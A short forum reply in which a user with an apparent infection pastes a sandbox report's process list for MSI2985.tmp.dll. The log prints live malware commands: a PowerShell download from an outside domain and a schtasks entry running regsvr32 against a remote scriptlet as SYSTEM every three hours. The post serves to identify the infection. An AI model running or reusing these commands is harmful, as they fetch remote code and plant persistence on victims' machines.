I have the same problem, and I just was just digging on the internet and found this:

https://www.reverse.it/sample/7d76d5b481208886acdb03894200d29014a84caa35cefc2e6f946eb609c33d47?environmentId=100

by the way, i don’t regularly use forums and don’t know the rules and how it works

but, going on…

on reverse.it they got this MSI2985.tmp.dll thing, that appears to call the powershell and make somes downloads

Analysed 16 processes in total (System Resource Monitor).

RunDLL “C:\MSI2985.tmp.dll” (PID: 2684)
rundll32.exe “C:\MSI2985.tmp.dll”,AdWork (PID: 3312)
powershell.exe $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://point.suibianzaimai.com/nealcf?memca=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZixhE3Rpr249meRaZi4x’,'%TEMP%\sD037.tmp’) (PID: 3204)
schtasks.exe schtasks /Create /SC HOURLY /MO 3 /ST 08:28:00 /TN “PowerWord-SCT-JT” /TR “regsvr32.exe /s /i:http://point.lotusiloveyou.com/?data=zDlkPGZir3h4mXQyZXRpw2tuzaI8N2YyNdVaZS84MdNaE2JaZq== scrobj.dll” /RU “SYSTEM” /F /RL HIGHEST (PID: 3264)